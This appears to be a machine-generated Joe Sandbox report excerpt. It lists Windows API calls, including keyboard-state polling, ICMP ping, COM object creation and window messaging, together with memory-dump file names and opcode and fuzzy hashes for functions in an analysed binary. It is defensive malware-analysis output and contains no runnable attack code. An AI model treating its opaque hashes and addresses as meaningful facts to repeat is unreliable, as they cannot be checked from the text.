                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176008265-0
                                                                                                                        • Opcode ID: 7fabb2f87edb29906fb725e20cdb78df3d282da9701a61609d33017bc6feb373
                                                                                                                        • Instruction ID: a2deb6cefed6a20255541a8b3b9a42dceba5a6df8bf94a283dc2999b1ede9930
                                                                                                                        • Opcode Fuzzy Hash: 7fabb2f87edb29906fb725e20cdb78df3d282da9701a61609d33017bc6feb373
                                                                                                                        • Instruction Fuzzy Hash: 5D61AA70900659EFDB10CFA4EC98EAE7BB9EB05318F18415AE481A3359D730AD05DB30
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DF9AA5
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DF9AA8
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DF9ACC
                                                                                                                        • _memset.LIBCMT ref: 00DF9ADD
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DF9AEF
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DF9B67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 830647256-0
                                                                                                                        • Opcode ID: 8892bfb87e0ba50dce82f316d5c4d2f823502d004419a7bcdf4112d6e4023810
                                                                                                                        • Instruction ID: bad13a7fdb4c0efc4baa9724873bef031824537667432175b451872a54d8af73
                                                                                                                        • Opcode Fuzzy Hash: 8892bfb87e0ba50dce82f316d5c4d2f823502d004419a7bcdf4112d6e4023810
                                                                                                                        • Instruction Fuzzy Hash: 8A617B71900208AFDB24DFA8CC91FEEB7B8EB09700F154599FA15E72A1D770AD45CB60
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00DD3591
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00DD3612
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00DD362D
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00DD3647
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00DD365C
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00DD3674
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00DD3686
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00DD369E
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00DD36B0
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00DD36C8
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00DD36DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: 2211d025b8895d73063e3325e69dfa5b1a31c4b3638de503c4f967fe08ae0d93
                                                                                                                        • Instruction ID: d55f67a82ab06064a91a7a837b2ec7306640b1eeada4bf83e123c7592963f7a3
                                                                                                                        • Opcode Fuzzy Hash: 2211d025b8895d73063e3325e69dfa5b1a31c4b3638de503c4f967fe08ae0d93
                                                                                                                        • Instruction Fuzzy Hash: 11416F74508BC97DFF319B6498143A5AEA16B11344F4C805BD5C6563C2EBA4DBC8CBB3
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00DCA2AA
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00DCA2F5
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DCA307
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCA327
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00DCA36A
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCA37E
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DCA393
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00DCA3A0
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCA3A9
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DCA3BB
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCA3C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: 836fa4bf05c17543f3c6d2d774332c93d0c832752da006fcb176e06489aadd5a
                                                                                                                        • Instruction ID: c67bfb2d454efdc3eccd68c2e975ec1910c748677e07edf0966835c6006dcf48
                                                                                                                        • Opcode Fuzzy Hash: 836fa4bf05c17543f3c6d2d774332c93d0c832752da006fcb176e06489aadd5a
                                                                                                                        • Instruction Fuzzy Hash: 2641FB7190021EAFDB019FA9DC84DDEBBB9FF48348F108069E551A7251DB34AA49CBB1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • CoInitialize.OLE32 ref: 00DEB298
                                                                                                                        • CoUninitialize.COMBASE ref: 00DEB2A3
                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,00E1D8FC,?), ref: 00DEB303
                                                                                                                        • IIDFromString.COMBASE(?,?), ref: 00DEB376
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DEB410
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DEB471
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                        • Opcode ID: cb23e0f9cd7bed880572a222626d266b151c921cc31b31fde29f1cbb9cf777df
                                                                                                                        • Instruction ID: e699d029aae1d02bb97d3fc19281123197b4ec70ec76c9c4b28d4814a7eb7727
                                                                                                                        • Opcode Fuzzy Hash: cb23e0f9cd7bed880572a222626d266b151c921cc31b31fde29f1cbb9cf777df
                                                                                                                        • Instruction Fuzzy Hash: 22618B70208341AFC710EF55C885B6BB7E8EF89724F14481AF985AB291C770ED48CBA2
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00DE86F5
                                                                                                                        • inet_addr.WS2_32(?), ref: 00DE873A
                                                                                                                        • gethostbyname.WS2_32(?), ref: 00DE8746
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00DE8754
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DE87C4
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DE87DA
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DE884F
                                                                                                                        • WSACleanup.WS2_32 ref: 00DE8855
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                        • String ID: Ping
                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                        • Opcode ID: ed4166cb943bac24cdede3e609ddae47d0feb07cc1b1e4e3d4f5586268dd4dcb
                                                                                                                        • Instruction ID: 89de61b2e7444ad63c4d73b5259d0bc4a3dbee8ed9a552892d85251a8e704897
                                                                                                                        • Opcode Fuzzy Hash: ed4166cb943bac24cdede3e609ddae47d0feb07cc1b1e4e3d4f5586268dd4dcb
                                                                                                                        • Instruction Fuzzy Hash: DF51B531604301AFDB11EF26DD85B6A77E4EF48710F14852AF99AE72A1DB30DC05DB61
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DF9C68
                                                                                                                        • CreateMenu.USER32 ref: 00DF9C83
                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00DF9C92
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DF9D1F
                                                                                                                        • IsMenu.USER32(?), ref: 00DF9D35
                                                                                                                        • CreatePopupMenu.USER32 ref: 00DF9D3F
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DF9D70
                                                                                                                        • DrawMenuBar.USER32 ref: 00DF9D7E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                        • Opcode ID: 90a69edb8def367ee06ec40e3d3f59f3579552db69a4e6ae89836d245eb844e1
                                                                                                                        • Instruction ID: 47d97295be48d5148088839437fbf1a9e24a9c7057f2bc5908841129c6205b26
                                                                                                                        • Opcode Fuzzy Hash: 90a69edb8def367ee06ec40e3d3f59f3579552db69a4e6ae89836d245eb844e1
                                                                                                                        • Instruction Fuzzy Hash: D9416A75A00209EFDB25EF65DC54BEABBB6FF48304F298428EA45A7351D730A914CF60
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00DDEC1E
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DDEC94
                                                                                                                        • GetLastError.KERNEL32 ref: 00DDEC9E
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00DDED0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        • Opcode ID: eb7aa294e823abf2504b4cba65117ce9a402c83dcbda31664abaacd62110a4c3
                                                                                                                        • Instruction ID: 9b372d76bc9b7828bfed832e285ea5c76bffd72bbcaab2824252d101925c79fa
                                                                                                                        • Opcode Fuzzy Hash: eb7aa294e823abf2504b4cba65117ce9a402c83dcbda31664abaacd62110a4c3
                                                                                                                        • Instruction Fuzzy Hash: AE319035A00209EFCB10EF69DD45AAEB7B4EF44700F148026E506EB391DA71DA41CBB1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00DCC782
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00DCC78D
                                                                                                                        • GetParent.USER32 ref: 00DCC7A9
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DCC7AC
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00DCC7B5
                                                                                                                        • GetParent.USER32(?), ref: 00DCC7D1
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00DCC7D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                        • Opcode ID: 390458c13bbe05091ae2195a179d2cb5b75d276fec360a27f24212fde29cd6c6
                                                                                                                        • Instruction ID: da09beaf94a1762cad4fa9d90da3dfe3fa07d0ff267f50fc0bfb376791281d93
                                                                                                                        • Opcode Fuzzy Hash: 390458c13bbe05091ae2195a179d2cb5b75d276fec360a27f24212fde29cd6c6
                                                                                                                        • Instruction Fuzzy Hash: 2621A1B4A00209AFDF05EF65CC85EFEB765EB45310F144119F666E32D1DB789819AB30
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00DCC869
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00DCC874
                                                                                                                        • GetParent.USER32 ref: 00DCC890
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DCC893
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00DCC89C
                                                                                                                        • GetParent.USER32(?), ref: 00DCC8B8
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00DCC8BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                        • Opcode ID: a96448a4fa9bfc7671f5e8358ae8aa4c35dcba6a1a3190334bad8e7acb06648f
                                                                                                                        • Instruction ID: ac524c216e89d21b6200322c72cb2b7ebfab4818096f7f919b3698da7cf6597e
                                                                                                                        • Opcode Fuzzy Hash: a96448a4fa9bfc7671f5e8358ae8aa4c35dcba6a1a3190334bad8e7acb06648f
                                                                                                                        • Instruction Fuzzy Hash: 7221AFB1A00209AFDF01AFA5CC85EFEBB69EF45300F144119F665E3191DB789819AB30
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 00DCC8D9
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00DCC8EE
                                                                                                                        • _wcscmp.LIBCMT ref: 00DCC900
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DCC97B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                        • Opcode ID: 815b20fb3d3f5a8456ff6554f33dd3307754b28d17cd759da4a183a006b31357
                                                                                                                        • Instruction ID: ebb76d1420995d8aba2b178e350d02a460e5266ba65cef6f61ceeed9de1be1a5
                                                                                                                        • Opcode Fuzzy Hash: 815b20fb3d3f5a8456ff6554f33dd3307754b28d17cd759da4a183a006b31357
                                                                                                                        • Instruction Fuzzy Hash: 5711C67A658303B9FA152A30AC0AEE6779CDB07765B20111AFB19F70D2FF71A9018974
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00DDB137
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1725837607-0
                                                                                                                        • Opcode ID: 424529dc2c51be229ff7183ffe44a9807e9477a7876a1fee3b801d46c9657d03
                                                                                                                        • Instruction ID: d70c79df41c754eed8f86cc1d6e7e5a06238cf64fb5da83aa686521cc7036acc
                                                                                                                        • Opcode Fuzzy Hash: 424529dc2c51be229ff7183ffe44a9807e9477a7876a1fee3b801d46c9657d03
                                                                                                                        • Instruction Fuzzy Hash: 47C18D75A0021ADFDB04CF98C481BAEBBB4FF09329F25806BE655E7341D734A945DBA0
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00DBBA74
                                                                                                                          • Part of subcall function 00DB8984: __mtinitlocknum.LIBCMT ref: 00DB8996
                                                                                                                          • Part of subcall function 00DB8984: RtlEnterCriticalSection.NTDLL(00DB0127), ref: 00DB89AF
                                                                                                                        • __calloc_crt.LIBCMT ref: 00DBBA85
                                                                                                                          • Part of subcall function 00DB7616: __calloc_impl.LIBCMT ref: 00DB7625
                                                                                                                          • Part of subcall function 00DB7616: Sleep.KERNEL32(00000000,?,00DB0127,?,00D9125D,00000058,?,?), ref: 00DB763C
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00DBBAA0
                                                                                                                        • GetStartupInfoW.KERNEL32(?,00E46990,00000064,00DB6B14,00E467D8,00000014), ref: 00DBBAF9
                                                                                                                        • __calloc_crt.LIBCMT ref: 00DBBB44
                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 00DBBB8B
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00DBBBC4
